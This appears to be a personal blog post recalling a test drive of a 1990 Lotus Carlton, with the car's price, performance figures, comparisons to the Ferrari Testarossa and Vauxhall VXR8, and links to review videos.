Oldskool Car Porn: The 1990 Lotus Carlton

I can never forget this car, seriously. My uncle drove a lot for work, I never knew exactly what he did, but he was the first person I knew that owned a laptop. He worked in some kind of manufacturing industry and was possibly a rep/salesman.

Which suits this car, well the original version anyway – the rather boring Vauxhall Carlton (along with the Ford Sierra) was a stock 90s salesman car.

1986 Vauxhall Carlton

Certainly not the most exciting car on the block. Until 1990 anyway.

I remember my uncle was looking for a new car and I happened to join him as he’d found a Lotus Carlton he’d like to look at, he didn’t know much about the car, and well nor did I. There wasn’t a whole lot of Internet back then, and there certainly wasn’t the abundance of information on sites like Wikipedia. It just so happened the car he wanted to look at was near where I lived, so he was coming down from Birmingham to have a look. I’d guess this was probably around 1992-1994 period, so the car was likely new, or barely used (1-2 years old).

When I saw it, I was like..is that it? I was pretty underwhelmed to be honest. For a £48,000 car (which was an enormous amount of money back then).

Lotus Carlton

Even the interior was kind of drab, dull and plasticy. It just had the odd Lotus emblem here and there.

Lotus Carlton Interior

Little did I realise this was a 377bhp, 3.6L twin turbo BEAST which could reach 100mph (160km/h) in less than 17 seconds. So we sat it in, took it for a test drive. It seemed fairly ordinary as we tootled around, then we reached the sliproad to the motorway.

We weren’t going slow, my uncle was in third gear as he reached the merge and he accelerated hard to pull onto the motorway at a decent speed (as you would)..the car span its wheels like a drag bike on a leash.

And once it found grip…it pressed my head so hard into the back of the seat I thought my eyeballs were going to collapse. It was quite an eye watering ride.

And yah, at that point I realised this car was really something special. I read whatever I could about it and was amazed to find that it could outperform the top supercars of that era like the Ferrari Testarossa which could do 0-60mp/h in only 5.3 seconds and had a top speed of 180mph (only 3 mph more than the Carlton!).

For a 4 door sedan..full of people, speeding along like a bullet train. Quite a crazy (and scary) proposition). Also the fact that it was a target for car thieves and criminals as the police didn’t have any cars fast enough to chase it made it a little unpractical.

Sadly my uncle didn’t buy the car, so I didn’t get to sit in it (or any other) ever again. There was only 320 Lotus Carlton’s released in the UK, so it is a rare car. Even now, 20+ years later they are fetching good money for mint condition examples (£12-20,000).

There is a modern day equivalent or a spiritual successor (in some ways), the Vauxhall VXR8.

But yah, something I still remember so vividly from my younger years. Some videos for reference..

Fifth Gear Vauxhall VXR8 vs Lotus Carlton

Top Gear Lotus Carlton

Autocar heroes: Lotus Carlton video review

Tags: , , , , , , , , ,

Continue Reading · No Comments · Cars/Motorsport